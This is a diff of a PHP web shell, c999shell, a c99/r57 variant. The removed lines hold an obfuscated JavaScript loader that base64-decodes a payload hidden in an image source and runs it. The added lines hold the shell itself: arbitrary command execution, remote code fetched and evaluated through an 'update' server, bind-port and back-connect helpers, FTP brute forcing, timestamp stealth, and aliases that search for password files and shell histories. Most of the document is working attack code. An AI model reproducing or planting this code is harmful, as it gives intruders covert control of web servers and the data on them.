WhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>

-<script type="text/javascript">

-if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};

-setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(0);}, 500);

-</script>

-<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>

-<tr>

- <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>

- <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>

-</tr>

-</table>

-<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>

-<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>

-<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c999shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> Shadow & Preddy | <a href="http://rootshell-security.net"><font color="#FF0000">RootShell Security Group</font></a><font color="#FF0000"></font> | <a href="http://r57shell.net"><font color="#FF0000">r57 c99 shell</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>

+<?php
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "1.0 pre-release build #16"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
+else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+//Authentication
+$login = ""; //login
+//DON'T FORGOT ABOUT PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied";
+
+$gzipencode = TRUE; //Encode with gzip?
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
+
+$c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server
+$c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+
+$donated_html = "<center><b>Owned by hacker</b></center>";
+/* If you publish free shell and you wish
+add link to your site or any other information,
+put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+0 - files and folders (as default),
+1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if TRUE and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+ // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c999";  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c999shvars"; // Cookie-variable name
+
+$usefsbuff = TRUE; //Buffer-function
+$copy_unset = FALSE; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
+ array("<b>Tools</b>",$surl."act=tools&d=%d"),
+ array("<b>Proc.</b>",$surl."act=processes&d=%d"),
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>Sec.</b>",$surl."act=security&d=%d"),
+ array("<b>SQL</b>",$surl."act=sql&d=%d"),
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
+ array("<b>Update</b>",$surl."act=update&d=%d"),
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
+ array("<b>Self remove</b>",$surl."act=selfremove"),
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c999shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc999shell\">c999shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img")
+{
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c999_buff_prepare"))
+{
+function c999_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c999_buff_prepare();
+if (!function_exists("c999_sess_put"))
+{
+function c999_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c999_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c999getsource"))
+{
+function c999getsource($fn)
+{
+ global $c999sh_sourcesurl;
+ $array = array(
+  "c999sh_bindport.pl" => "c999sh_bindport_pl.txt",
+  "c999sh_bindport.c" => "c999sh_bindport_c.txt",
+  "c999sh_backconn.pl" => "c999sh_backconn_pl.txt",
+  "c999sh_backconn.c" => "c999sh_backconn_c.txt",
+  "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",
+  "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c999sh_sourcesurl.$name);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("c999sh_getupdate"))
+{
+function c999sh_getupdate($update = TRUE)
+{return "Can't connect to update-server!";
+
+ $url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
+ $data = @file_get_contents($url);
+ if (!$data) {return "Can't connect to update-server!";}
+ else
+ {
+  $data = ltrim($data);
+  $string = substr($data,3,ord($data{2}));
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+  if ($data{0} == "\x99" and $data{1} == "\x03")
+  {
+   $string = explode("\x01",$string);
+   if ($update)
+   {
+    $confvars = array();
+    $sourceurl = $string[0];
+    $source = file_get_contents($sourceurl);
+    if (!$source) {return "Can't fetch update!";}
+    else
+    {
+     $fp = fopen(__FILE__,"w");
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
+    }
+   }
+   else {return "New version are available: ".$string[1];}
+  }
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
+  else {return "Error in protocol: segmentation failed! (".$data.") ";}
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by c999Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
